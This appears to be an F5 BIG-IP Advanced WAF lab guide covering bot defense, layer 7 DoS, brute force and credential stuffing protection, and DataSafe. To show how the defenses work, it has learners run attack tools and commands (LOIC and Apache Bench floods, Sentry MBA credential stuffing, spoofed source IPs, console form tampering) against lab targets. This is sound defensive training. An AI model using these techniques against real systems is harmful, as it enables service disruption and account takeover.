F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 91
ASM Lesson 12 – Layer 7 Denial-of-Service and Bot Defense Protection
− Examine the Bot Name and Bot Class values.
BIG-IP AWAF identified this as a curl bot from the Untrusted bot class.
− Reload the Application > Requests tab.
There are log entries from the Internet Explorer request. Because none of the curl requests passed the CAPTCHA
challenge, none of these requests were forwarded to the web servers.
− Select the Select all items checkbox, and then click Delete Requests.
− In the Bot Defense Profiles tab click dvwa_bot_defense_profile.
− Click Bot Mitigation Settings, then from the Untrusted Bot list select Block.
− From the Malicious Bot list select TCP Reset, and then click Save.
− In the Shell window resubmit the following command.
curl http://10.1.10.35/login.php?[1-60]

All the curl commands are now blocked.

− In the Shell window resubmit the following command.
phantomjs.exe index_page.js

The page title no longer displays. This is because phantom.js isn’t receiving an HTTP response due to failing
the browser challenge.
− In the Configuration Utility reload the Application > Requests tab.
There are no new log entries. All new curl and phantom.js requests were blocked by BIG-IP AWAF’s bot defense
protection prior to being examined by the BIG-IP ASM security policy.
− Reload the Bot Defense > Bot Requests tab.
The requests for /index.php were challenged by BIG-IP AWAF, which the script could not respond to.
− In the Shell window copy and paste the following command.
ab -n 1000 -c 1000 http://10.1.10.35/dvwa/images/login_logo.png

Apache Bench fails to submit the 1000 requests. The connection was closed by the remote host.
− Close XAMPP, and then in the Configuration Utility reload the Application > Requests tab.
There are no event log entries. All new ab requests were blocked by BIG-IP AWAF’s bot defense protection.
− Reload the Bot Defense > Bot Requests tab, and then examine the Request Status, Mitigation Action,
and Bot Details for the selected log entry.

The requests for login_logo.png were Denied with the mitigation of TCP Reset due to being recognized as being
a malicious bot. The bot signature is ab, and the bot signature category is DOS Tool.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 92
ASM Lesson 12 – Layer 7 Denial-of-Service and Bot Defense Protection

Task 4 – Enable Layer 7 DoS Protection

Configure a layer 7 DoS protection profile, and then add the profile to dvwa_virtual.

− Using the Bot Defense Profiles tab open the Virtual Server List page and click dvwa_virtual, and then open
the Security > Policies page.
− From the Bot Defense Profile list select Disabled, and then click Update.

→NOTE: You’re disabling this profile to first show a successful layer 7 DoS attack.

− Open Start > LOIC, and then configure the attack using the following information.
IP 10.1.10.35 (Click Lock on)
HTTP Subsite /security.php
Method HTTP
Wait for reply Disabled (unchecked)

− Click IMMA CHARGIN MAH LAZER, then let the attack run for five seconds, and then click Stop flooding.
− In the Configuration Utility reload the Application > Requests tab.
In just a few of seconds, several hundred requests for /security.php were considered legal and sent to
the web servers for processing.
− Reload the Application > Requests page to ensure there are no new log entries, then select the Select all items
checkbox, and then select Delete Requests > Delete all requests.
− Using the dvwa_virtual tab open the Security > DoS Protection > Protection Profiles page and click Create.
− Name the new profile dvwa_dos_profile.
− Under Application Security click Behavioral & Stress-based Detection.
− For Operation Mode click Blocking, and then change the value to Off.
− Click TPS-based Detection, then click Off, and then change the value to Blocking.
Using TPS-based detection, BIG-IP AWAF can prevent layer 7 DoS attacks based on the client side, based on
transactions-per-second.
− For By Source IP click Edit, then select the Client Side Integrity Defense and Request Blocking checkboxes,
and then for Request Blocking select Block All.
If traffic from a source IP meets the conditions you’re about to set, BIG-IP AWAF will issue a JavaScript challenge.
AWAF will then block all suspicious IP addresses for the period set in the Prevention Duration section.
− Update the following values.
TPS increased by 5%
and reach at least 5
OR TPS reached 5

− For Prevention Duration click Edit, then for Escalation Period edit the value to 5 seconds, and then click Finished.
You’re lowering these values for the purposes of running this exercise in a virtual environment.
The default settings are appropriate for most production environments.
− Open the Virtual Server List page and click dvwa_virtual, and then open the Security > Policies page.
− From the DoS Protection Profile list select Enabled, and then for Profile select dvwa_dos_profile.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 93
ASM Lesson 12 – Layer 7 Denial-of-Service and Bot Defense Protection
− From the Bot Defense Profile list select Enabled, then for Profile select dvwa_bot_defense_profile,
and then click Update.
− Use this tab to open the Security > Reporting > DoS > Dashboard page, and then for Real Time switch
the toggle to ON.
− On the UDF class portal page, for the Traffic Generator image click Console, and then log in
as f5 student / admin.F5demo.com
− In LOIC click IMMA CHARGIN MAH LAZER and let the attack run for 25 seconds, and then click Stop Flooding.
You need to let the attack run long enough for the client-side integrity mitigation to kick in, and then
the request blocking mitigation to kick in after that.
− Open Internet Explorer and click the DVWA bookmark.
You are blocked from accessing the web page due to client-side integrity defense.
− Close Internet Explorer, then on the Traffic Generator desktop open Chrome and click the DVWA bookmark,
and then once the login page displays close the Chrome window.
The client-side integrity defense only affects the workstation that launched the attacks. All other users can still
access the web application.
− In the Configuration Utility reload the Application > Requests tab.
Only the requests from the Traffic Generator (10.1.10.51) were successful and we were sent to the web servers.
− Close this tab, then reload the Bot Requests page, and then select one of the /security.php log entries.
The requests from LOIC were Denied because they were identified as a malicious bot.
− Close the Bot Requests tab, then in LOIC click IMMA CHARGIN MAH LAZER and let the attack run for 30 seconds,
and then click Stop Flooding.
− Examine the DoS Dashboard tab.
There is a DoS attack underway.
− Place your mouse over the attack to view attack details.

− Click the attack to select it.

− On the right-side of the page expand the Mitigations widget.

Initial request matched the client-side integrity mitigation (a browser challenge), and then after a certain point
requests started getting blocked because their source IP address was blocked.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 94
ASM Lesson 12 – Layer 7 Denial-of-Service and Bot Defense Protection

Task 5 – View Additional Bot Defense and DoS Reports

View additional logs and reports available with BIG-IP AWAF bot defense and layer 7 protection.

− Open the Event Logs > Bot Defense > Bot Traffic page.
This page displays several bot traffic statistics for the entire BIG-IP AWAF system.
− Under Virtual Servers click dvwa_virtual.
If your BIG-IP system has several virtual servers, you can view bot statistics by virtual server by selecting
a specific virtual server.
− In the Traffic by Class section, move your mouse over the chart sections.

This chart displays the number of requests handled by BIG-IP AWAF and the percentage discarded as being
generated by bots.
− Scroll down and view the details in the Bot Categories, Accepted Requests, and Denied Requests sections.

Questions:
How many requests matched the Browser Masquerading bot category? _____________

How many requests matched the DOS Tool bot category? _____________

How many accepted requests passed the CAPTCHA Challenge? _____________

How many requests were denied for failing the CAPTCHA Challenge? _____________

− At the bottom of the page click View Detected Bots.

This page displays all bots that were identified during the time range targeting the selected virtual server.
− Open the Event Logs > DoS > Application Events page.
The first log entry (Source IP-Based Client Side Integrity Defense) identifies when the L7 DoS attack was
identified, and source IP client-side integrity defense began. The second log entry (Source IP-Based Block All) is
when the IP address failed the JavaScript challenge and was considered suspicious and BIG-IP AWAF began to
block all requests from this IP address. You may have a third request identifying the end of the attack.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 95
ASM Lesson 12 – Layer 7 Denial-of-Service and Bot Defense Protection
− Expand the one of the attack details.

You can see the source IP address of the attack, which is the IP address that’s being blocked.

PREPARE FOR NEXT EXERCISE

− Close LOIC.
− In PuTTY, at the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual dvwa_virtual
tmsh delete ltm pool dvwa_pool
tmsh delete ltm node 10.1.20.17
tmsh delete ltm policy asm_auto_l7_policy__dvwa_virtual
tmsh delete asm policy dvwa_security_policy
tmsh delete security bot-defense profile dvwa_bot_defense_profile
tmsh delete security dos profile dvwa_dos_profile
tmsh delete security log profile dvwa_log_profile
exit

Question and Answer Key

Task 5 – View Additional Bot Defense and DoS Reports
Q: How many requests matched the Browser Masquerading bot category?
A: Answers will vary, but it should be very high.

Q: How many requests matched the DOS Tool bot category?

A: 1000

Q: How many accepted requests passed the CAPTCHA Challenge?

A: 1

Q: How many requests were denied for failing the CAPTCHA Challenge?
A: 60

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 96
ASM Lesson 13 – Distributed Brute Force and Credential Stuffing Protection

ASM Lesson 13 – Distributed Brute Force and Credential

Stuffing Protection

NOTES

________________________________________________________________________________________

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 97
ASM Lesson 13 – Distributed Brute Force and Credential Stuffing Protection

Exercise – Use Distributed Brute Force and Credential

Stuffing Protection
• Estimated completion time: 60 minutes.

Task 1 – Run a Brute Force Attack

Use Sentry MBA to launch a brute force attack.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.

− From the Exercise_Files directory open wordlist – multiple usernames.

You’ve discovered that a username Bob Smith uses P@ssword! as their password. This text file contains
thousands of username combinations for this person based on their first, middle, and last name, using the same
password. You’ll use this to attempt a brute force attack for the user’s personal user account username in the
Hackazon web application.
− Close Notepad, and then open Start > Sentry_MBA.
You’ll use this tool to submit the brute force attack against the Hackazon login page.
− On the Lists > Wordlist page under WordList, click the open icon.

− Navigate to the Documents > Exercise Files directory, and then select wordlist – multiple usernames.
− Click Go!!, and then click Start the Bruteforcer Engine!
This tool is used to target login pages with username / password lists and will return successful logins in
the Hits tab.
− Examine the Progress and Wordlist Position.
The brute force continues to progress through the entries in the wordlist.
− Examine the Hits tab.
You successfully found the victim’s username: [email protected].
− Click Abort.
− Open Internet Explorer and click the Hack Login bookmark, and then log in as [email protected] / P@ssw0rd!
− On the Hackazon My Account page click Profile, and then close the Internet Explorer window.
Through the distributed brute force attack you’ve succeeded in finding this user’s personal username.
You could now test this username and password on several other web applications, such as online banking,
eCommerce, and social networking.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 98
ASM Lesson 13 – Distributed Brute Force and Credential Stuffing Protection

Task 2 – Create a Security Policy and Configure Brute Force Protection

Create a security policy for hackazon_virtual and then add source-based brute force protection.

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name hackazon_security_policy
Policy Template Rapid Deployment
Virtual Server hackazon_virtual (HTTP)
Enforcement Mode Blocking
Policy Building Learning Mode Automatic
Trusted IP Addresses 10.1.10.0 / 255.255.255.0 (Scroll right and click Add)

− Once the policy is created open the Learning and Blocking Settings page.
− Expand URLs and from the Learn New HTTP URLs list select Always, then click Save, and then click Apply Policy.
− Open a New private window (Firefox) and click the Hack Login bookmark, and then close Firefox.
− In the Configuration Utility open the Policies List page and click hackazon_security_policy.
(HINT: You can simply click on “Application Security”.)
− For Policy Building Learning Mode click Disabled, and then click Save.
You used this process to learn about the /user/login URL, which you’ll need when configuring a Login Page
element for brute force protection.
− Open the Application Security > Sessions and Logins > Login Pages List page and click Create.
− For Login URL leave Explicit > HTTP selected, and then in the field start typing /user/login, and then select
the URL once it displays.
− Configure the login page using the following information, and then click Create.
Authentication Type HTML Form
Username Parameter Value username
Password Parameter Value password
A string that should NOT appear in the response incorrect
Expected HTTP response status code 302

− Open the Application Security > Brute Force Attack Prevention page and click Create.
− From the Login Page list select [HTTP]/user/login.
− In the Source-based Brute Force Protection section configure the following:
Username Trigger: Never
IP Address Action: Alarm and Blocking Page

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 99
ASM Lesson 13 – Distributed Brute Force and Credential Stuffing Protection
− In the Distributed Brute Force Protection section configure the following:
Detect Distributed Attack Never
Detect Credential Stuffing Never

− Click Create, and then click Apply Policy.

− In Sentry MBA click Go!!, then select the Reset WordList Position checkbox, and then
click Start the Bruteforcer Engine!
− Examine the Progress and Wordlist Position.
After a couple seconds the progress and wordlist positions no longer increase.
− Examine the Hits tab.
No username/password combinations are being discovered.

Question:
Why isn’t this brute force attack succeeding? _______________________________________

− After about 45 seconds click Abort and then Stop.

− In the Configuration Utility right-click on Event Log and select Open link in new tab, and then examine
the new tab.
There are thousands of blocked requests.
− Select the most recent blocked log entry and under Occurrences click 1.
The BIG-IP ASM brute force protection identified the brute force request coming from the same client IP address
and blocked all requests after the threshold of 20. Currently, the BIG-IP ASM brute force protection is
successfully protecting the Hackazon login page from brute force attacks from a single IP address.
− Select the Select all items checkbox and select Delete Requests > Delete all requests.

Turn the brute force attack into a distributed brute force attack
− Navigate to Local Traffic and right-click on Virtual Servers and select Open link in new tab, then in the new tab
click hackazon_virtual, and then open the Resources page.
− For iRules click Manage, then add brute_sources to the virtual server, and then click Finished.
This iRule modifies the source IP address of every request.
− Use this tab to open the Policies List page and click hackazon_security_policy.
− For Trust XFF Header select the Enabled button, then click Save, then click Apply Policy, and then close
the third tab.
This setting will enable BIG-IP ASM to use the X-Forwarded-For value (from the iRule) as the source IP address
of each incoming request.
− In Sentry MBA click Go!!, then select the Reset WordList Position checkbox, and then
click Start the Bruteforcer Engine!
− Examine the Progress and Wordlist Position.
The brute force continues to progress through the entries in the wordlist.
− Examine the Hits tab.
You once again discovered the username [email protected].

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 100
ASM Lesson 13 – Distributed Brute Force and Credential Stuffing Protection
− Examine window with the different HTTP response codes.

All requests are returning with HTTP 200 response codes.

Question:
Why is this same brute force attack now succeeding? ________________________________

− Once the username has been discovered click Abort.

− In the Configuration Utility reload the Application > Requests tab.
The distributed brute force attack generated hundreds of legal requests from multiple IP addresses from
the same region.
− Click the filter icon.

− Select the Method / Protocol / Result tab.

− For Login Result select Successful, then click Apply Filter, and then select a couple of log entries and examine
the Username value.

You can quickly see which usernames were discovered during this distributed brute force attack.
− Click the filter icon, then for Login Result select Failed, then click Apply Filter, and then select a few of the
log entries and examine the Username value.
You can also see how many attempted login requests failed and the usernames that were attempted.
− Select the Select all items checkbox and select Delete Requests > Delete all requests.

Task 3 – Enable Distributed Brute Force Attack Protection

Update the brute force protection to identify and mitigate distributed brute force attacks.

− On the Brute Force Attack Prevention tab click [HTTP] /user/login.

− In the Distributed Brute Force Protection section, for Detect Distributed Attack select the After option,
and use 50 failed login attempts.
− Select the Mitigation list.
For now, you’ll leave the mitigation set to Alarm and CAPTCHA.
− Click Save, and then click Apply Policy.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 101
ASM Lesson 13 – Distributed Brute Force and Credential Stuffing Protection
− In Sentry MBA click Go!!, then select the Reset WordList Position checkbox, and then
click Start the Bruteforcer Engine!
− Examine the Progress and Wordlist Position.
After about five seconds the Progress and Wordlist Position both stop.
− Examine the Hits tab.
No username/password combinations are being discovered.
− Open a new Firefox window and click the Hack Login bookmark, and then log in
as [email protected] / abc123.
− Enter the CAPTCHA challenge (which is case sensitive), and then click Logout and close the Firefox window.
Valid users can access the web application during a distributed brute force attack.
− On the UDF class portal page, for the Traffic Generator image click Console, and then log in
as f5 student / admin.F5demo.com
− On the Traffic Generator desktop open Firefox click the Hack Login bookmark, and then log in as admin / admin.
All users are verified using the CAPTCHA challenge during a distributed brute force attack.
− Close the Firefox window without entering the CAPTCHA challenge.
− In Sentry MBA click Abort and then Stop!
− In the Configuration Utility on the Application > Requests tab click the Filter icon, then for Login Request
click Successful, and then click Apply Filter.
There are just a couple successful login attempts.
− Select the Illegal log entry, and then under Occurrences click 1.

This log entry was generated when you entered the correct CAPTCHA challenge.
− Click the Filter icon, then for Login Request click Failed, and then click Apply Filter.
These are the log entries that were generated before the CAPTCHA challenge mitigation began.
− Click the Filter icon, then click Failed to clear this button, then select the Basic tab, then for Request Status
click Challenged, and then click Apply Filter.
There are thousands of requests from Sentry MBA that were sent the CAPTCHA challenge but failed to submit
a challenge response.
− On the Brute Force Attack Prevention tab click [HTTP]/user/login.
− In the Distributed Brute Force Protection section, for Mitigation select Alarm and Client Side Integrity,
then click Save, and then click Apply Policy.
− In Sentry MBA click Go!!, then select the Reset WordList Position checkbox, and then
click Start the Bruteforcer Engine!
After about five seconds the progress and wordlist positions stop.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 102
ASM Lesson 13 – Distributed Brute Force and Credential Stuffing Protection
− Examine the window with the different HTTP response codes.
After a few seconds, requests are returning with HTTP 421 response codes.
− Open a new Firefox window and click the Hack Login bookmark, and then log in
as [email protected] / abc123. Once the My Account page displays, click Logout, and then close
the Firefox window.
Notice it takes a couple seconds for the next page to load. This is because it is being challenged by BIG-IP AWAF.
However, the Firefox browser passes the JavaScript challenge.
− In the Configuration Utility, use the Brute Force Attack Prevention tab to open the Security > Event Logs >
Application > Brute Force Attacks page.
This page contains extensive details about the distributed brute force attack, including the attack type,
the number of detected failed logins, the number of detected login attempts, and the mitigation method.
− View the Login Stress details.
The Login Stress value is a health measure function of the current failed logins and detection threshold.
A value of 100% means that login URL is under attack.
− Select the ongoing attack, and then examine the Attack Summary tab.

Questions:
How many detected login attempts were there? _____________

How many client side integrity challenges were there? _____________

− In Sentry MBA click Abort and then Stop!, and then close Sentry MBA.

Task 4 – Enable Credential Stuffing Detection

Add credential stuffing detection to the /user/login page.

− In the Brute Force Attack Prevention tab click [HTTP] /user/login.

− For Detect Distributed Attack select the Never option and click Save, and then click Apply Policy.
− From the Exercise Files directory open wordlist – leaked credentials.
This is a list of known leaked usernames and passwords that was purchased from a malicious user. You’re going
identify if any of these leaked credentials can be used on the Hackazon web application.
− Close Notepad, then open Sentry MBA, and then open Wordlist.
− Click the icon to clear the current wordlist.

− Click the open icon, and then select wordlist – leaked credentials.
− Click Go!!, then select the Use the Progression Position (1) checkbox, then click Start the Bruteforcer Engine!

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 103
ASM Lesson 13 – Distributed Brute Force and Credential Stuffing Protection
− Let the attack run for several seconds and examine the Hits tab.
Several leaked username/password combinations are found as successful for the Hackazon web application.

− After there are 9 found username/password combinations click Abort.

− Notice there is a found username/password combo for [email protected]:admin.
− Open a new Firefox window and click the Hack Login bookmark, and then log in
as [email protected] / admin.
− On the Hackazon My Account page click Profile.
Through the credential stuffing attack, you’ve discovered one or more web applications that this user uses with
the same user credentials, including an administrator’s credentials.
− Click Logout, and then close the Firefox window.
− In the Configuration Utility, on the Brute Force Attack Prevention tab click [HTTP] /user/login.
− In the Distributed Brute Force Protection section, for Detect Credential Stuffing select the After option, and
then use 40 login attempts that match known leaked credentials dictionary.
− Click Save, then click Apply Policy, and then close the tab.
− In Sentry MBA click Go!!, then select the Reset WordList Position checkbox, and then
click Start the Bruteforcer Engine!
One username/password combination is identified, but no more after that. Remember you configured
the protection to kick in after 40 failed login attempts.
− After about 30 seconds, in the Configuration Utility reload the Brute Force Attacks page.

Notice the new ongoing attack is listed as Credentials Stuffing.

− Close Sentry MBA.

PREPARE FOR NEXT EXERCISE

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 104
ASM Lesson 13 – Distributed Brute Force and Credential Stuffing Protection

Question and Answer Key

Task 2 – Create a Security Policy and Configure Brute Force Protection
Q: Why isn’t this brute force attack succeeding?
A: The requests were blocked by the source-based IP address brute force mitigation (Alarm and
Blocking Page).

Q: Why is this same brute force attack now succeeding?

A: The requests are no longer coming from the same source IP address.

Task 3 – Enable Distributed Brute Force Attack Protection

Q: How many detected login attempts were there?
A: Answers will vary, but it should be several thousand.

Q: How many client side integrity challenges were there?

A: Answers will vary, but it should be several thousand.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 105
ASM Lesson 14 – Behavioral DoS Protection

ASM Lesson 14 – Behavioral DoS Protection

NOTES

________________________________________________________________________________________

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 106
ASM Lesson 14 – Behavioral DoS Protection

Exercise – Use Behavioral DoS Protection

• Estimated completion time: 60 minutes.

Task 1 – Create a Security Policy and a DoS Protection Profile

Create a security policy for test_site_virtual, and then configure a DoS protection profile for test_site_virtual using
behavioral DoS detection and mitigation.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.

− If necessary, update the Windows time:
o Select the clock and click Date and time settings.
o Click Sync now, and then close the Date & time dialog box.
− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool test_site_pool members add { 10.1.20.11:80 { address 10.1.20.11 } }
tmsh create ltm profile http http_profile insert-xforwarded-for enabled
tmsh create ltm virtual test_site_virtual destination 10.1.10.20:80 ip-protocol tcp profiles add { tcp { }
http_profile { } } rules { random_ip_addresses } security-log-profiles add { "Log all requests" } pool
test_site_pool

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name test_site_security_policy
Policy Template Rapid Deployment
Virtual Server test_site_virtual (HTTP)

→NOTE: A BIG-IP ASM security policy isn’t required to use an L7 DoS protection profile. You’re adding this so that
you can view request details using the BIG-IP ASM event log.

− Once the policy is created click test_site_security_policy, then for Trust XFF Header select the Enabled button,
then click Save, and then click Apply Policy.
The test_site_virtual uses an iRule to simulate good and bad traffic from a few specific geolocations.
− Open the Security > DoS Protection > Protection Profiles and click Create.
− Name the new profile test_site_dos_profile. (NOTE: For this exercise to work as written, you MUST enter this
exact name for the DoS profile.)
− Under Application Security click Behavioral & Stress-based Detection.
− For Behavioral Detection and Mitigation click Edit.
Note that the Bad actors behavior detection and Request signatures detection checkboxes are already selected.
You’ll also leave the Mitigation set to Standard protection.
− Click Finished.
− Open the Virtual Server List page and click test_site_virtual, and then open the Security > Policies page.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 107
ASM Lesson 14 – Behavioral DoS Protection
− From the DoS Protection Profile list select Enabled, then for Profile select test_site_dos_profile, and then
click Update.
− Resize the PuTTY window by making it wider.
− In PuTTY copy and paste the following command.
admd -s vs./Common/test_site_virtual+/Common/test_site_dos_profile.info.learning

This command displays the traffic learning progress. Currently all four values are 0 because there is no traffic
arriving at the BIG-IP system.

Task 2 – Generate a Baseline

Use a script to generate valid traffic to test_site_virtual.

− On the UDF class portal page, for the Traffic Generator image click Console, and then log in
as f5 student / admin.F5demo.com
− From the bottom of the page open a Terminal window, and then at the prompt type the following
(type 2 when prompted):
./baseline_menu.sh

This script makes several requests to 10.1.10.20 (test_site_virtual) for different URLs, using different
web browsers, and from different client IP addresses. This will be used to establish the baseline.
Note that the status response for each request is 200.
− In the Configuration Utility open the Event Logs > Application > Requests page.
(HINT: You can simply click on “Event Logs”.)
There are hundreds of legal requests from several geolocations (United States, United Kingdom, Brazil,
Australia, and Singapore).
− Navigate to Security > DoS Protection and right-click on Signatures, then select Open link in new tab, and then in
the new tab click Dynamic to view any dynamic signatures.
There are currently no dynamic signatures.
− Examine the PuTTY window.
You can use these details to ensure that BIG-IP AWAF has accumulated enough baseline learning details.
This command contains 4 comma-separated values that show the learning progress:

→NOTE: It will take several minutes to fully create the baseline. Perhaps use this time to use the restroom or get a
beverage.

o 1st value: How confident BADOS is in the baseline learning. This should be over 80%.
o 2nd value: The number of learned bins. This should be > 0.
o 3rd value: The number of learned requests. This should be > 2000.
o 4th value: How confident, as a percentage, BIG-IP AWAF is in the good table. It must be 100% for behavioral
signatures to work.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 108
ASM Lesson 14 – Behavioral DoS Protection
→NOTE: Do not move on until the first value is over 80%, the third value is over 2000, and the fourth value
is 100%. In the Event Log, it will take approximately 7000 requests before you’ll see these values.

− In the Configuration Utility, on the Application > Requests tab select the Select all items checkbox, and then
select Delete Requests > Delete all requests.

Task 3 – Simulate a Layer 7 DoS Attack

Simulate a layer 7 DoS attack targeting test_site_virtual.

− In the Traffic Generator window open a second Terminal window and type the following (type 2 when prompted):
./AB_DOS.sh

This script uses Apache Bench and targets 10.1.10.20 (test_site_virtual). Notice that the first script stops.
− In the Configuration Utility reload the Application > Requests page.
There are now requests from Syria, North Korea, and Congo.
− Let the attack run for about 30 seconds.
− On the Signatures tab reload the page, and then click Dynamic. Continue to do this until you see one or more
dynamic signatures listed.

Note that they current Approval State is Unapproved.

− For each listed dynamic signature select the click its Name, then on the left side of the page select
the Approved checkbox, then click Update, and then close the tab.
− Continue to let the attack run for about 3 minutes before moving on.
− In the Traffic Generator window type Ctrl+C to stop by the baseline generator.
− Type Ctrl+C and then 4 and then Enter to stop the attack.
− In the Configuration Utility, on the Application > Requests tab select the Select all items checkbox, and then
select Delete Request > Delete all requests.
− In the Traffic Generator window use the second Terminal window to start the attack again.
(Type 2 when prompted.)
− In the Configuration Utility reload the Application > Requests tab.
There are no new log entries, as all requests are being blocked by BIG-IP AWAF’s DoS protection using the
dynamic signature(s).
− Let the attack run for a couple minutes. Use this time to use the restroom or get a beverage.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 109
ASM Lesson 14 – Behavioral DoS Protection
− After the attack has run for a few minutes, navigate to Reporting > DoS and right-click on Analysis, then
select Open link in new tab, and then the new tab adjust the time frame to view about the past 15 minutes.

− Collapse the BIG-IP Health, Virtual Servers, and Attacks sections, and then in the HTTP section view the
Transactions Outcomes (Avg TPS) chart

Most requests are blocked due to Blocked Bad Request (dynamic signature matching) and Blocked Bad Actor.
− Resize the widget column by making it wider.

− Scroll down and expand the Transaction Outcomes widget.

→NOTE: Be sure to use the “inner” scroll bar.

You can view more details about the number of requests that were blocked due to matching a dynamic signature
(Blocked Bad Request) or matching the source IP address of a known bad actor (Blocked Bad Actor).
− Scroll down and expand and then view the Behavioral Signatures widget.
You can view how many requests were blocked due to matching the new dynamic signatures.
− Reload the Application > Requests tab.
No layer 7 DoS attack traffic was processed by the BIG-IP ASM security policy and sent to the pool members.
− In the Traffic Generator window start the baseline generator again (type 2 when prompted).
− In the Configuration Utility reload the Application > Requests tab.
Valid user traffic is still processed by the BIG-IP ASM security policy and forwarded to the pool members.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 110
ASM Lesson 14 – Behavioral DoS Protection
− In the DoS Analysis tab open the Reporting > DoS > Dashboard page, and then resize the widget column by making
it less wide.
− View the DoS attack details in the Attacks section.
− Use the icon on the top-right side of the table to hide the Vector, Virtual Server, Start Time, and End Time
columns.

Questions:
What type of mitigation was used in this DoS attack? ____________________________

How many DoS attack transactions were blocked? ________________________

− Close the tab.

− In the Traffic Generator window type Ctrl+C to stop by the baseline generator.
− Type Ctrl+C and then 4 and then Enter to stop the attack.

PREPARE FOR NEXT EXERCISE

− In PuTTY, type Ctrl+C to stop the previous command, and then copy and paste the following TMSH commands.
tmsh delete ltm virtual test_site_virtual
tmsh delete ltm pool test_site_pool
tmsh delete ltm node 10.1.20.11
tmsh delete ltm profile http http_profile
tmsh delete ltm policy asm_auto_l7_policy__test_site_virtual
tmsh delete asm policy test_site_security_policy
tmsh delete security dos profile test_site_dos_profile
exit

Question and Answer Key

Task 3 – Simulate a Layer 7 DoS Attack
Q: What type of mitigation was used in this DoS attack?
A: Behavioral Mitigation

Q: How many DoS attack transactions were blocked?

A: Answers will vary, but the number of transactions should be well over 500K.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 111
ASM Lesson 15 – DataSafe

ASM Lesson 15 – DataSafe

NOTES

________________________________________________________________________________________

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 112
ASM Lesson 15 – DataSafe

Exercise – Use DataSafe Protection

• Estimated completion time: 45 minutes.

Task 1 – View How Malware Can Steal Confidential Data

Use the Chrome developer tools to examine how malware can steal confidential data such as usernames
and passwords.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.

− Open Chrome and press the F12 key, then click the DVWA bookmark, and then enter the credentials
victim / P@ssw0rd! but do not click Login.
− In the inspection window on the Console tab type (or copy and paste) the following and press Enter.
document.forms[0]

− Place your mouse over the form element, and then examine the web page.

This is the form where the user credential fields are displayed.
− In the console, one at a time type (or copy and paste) each of the following lines and press Enter after each.
document.forms[0].username.value
document.forms[0].password.value

These values haven’t yet been submitted and are therefore available in cleartext for form grabbing.
− In the console type (or copy and paste) the following and press Enter after each
document.forms[0].username.value = "admin"
document.forms[0].password.value = "password"

− Examine the web page form.

Malware can manipulate parameter values before they are submitted.
− Click Login to use these modified credentials.
− In the inspection window select the Network tab and click login.php, and then view the bottom of
the Headers tab.

Both the username and the password were successfully modified and used to log into the web application.
They are also both displayed in cleartext. Both fields are currently vulnerable to a malware script.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 113
ASM Lesson 15 – DataSafe
− Examine the name values for both user-input fields in the form.

We need to protect two parameters: the username and password parameters on the /login.php URL.

Task 2 – Enable DataSafe Protection

Add BIG-IP DataSafe protection to the /login.php page.

− Open a new Chrome window and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Security > Data Protection > BIG-IP DataSafe page and click Create.
− For Profile Name enter dvwa_datasafe_profile.
− Open the URL List page, and then click Add URL.

− For URL Path leave Explicit selected and enter /login.php.

− From the left menu open the Application Layer Encryption page.
− Leave the Identify Stolen Credentials and Advanced > Hide Password Revealer Icon checkboxes selected
and clear all other configuration checkboxes.
− From the left menu open the Parameters page, and then click Add.
− For Parameter Name leave Explicit selected and enter username.
− Select the Application Layer Encryption > Encrypt checkbox, and then click Repeat.
− For Parameter Name leave Explicit selected and enter password.
− Select the Application Layer Encryption > Encrypt checkbox, and then click Create.

− Click Save.
